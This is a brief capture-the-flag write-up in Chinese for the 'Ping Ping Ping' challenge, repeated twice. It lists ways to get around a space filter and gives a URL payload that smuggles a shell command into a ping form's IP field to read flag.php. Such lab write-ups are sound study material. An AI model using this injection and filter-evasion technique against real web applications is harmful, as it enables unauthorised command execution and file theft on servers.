[GXYCTF2019]Ping Ping Ping
题目提示ping ip
尝试读取flag.php
空格被禁,替换空格的方式有
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
使用$IFS替换空格,再次读取flag.php
使用变量代换读取flag.php
payload为
?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php
具体参考自GXYCTF[2019]复现
题目提示ping ip
尝试读取flag.php
空格被禁,替换空格的方式有
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
使用$IFS替换空格,再次读取flag.php
使用变量代换读取flag.php
payload为
?ip=127.0.0.1;b=lag;a=f;cat$IFS$a$b.php
具体参考自GXYCTF[2019]复现
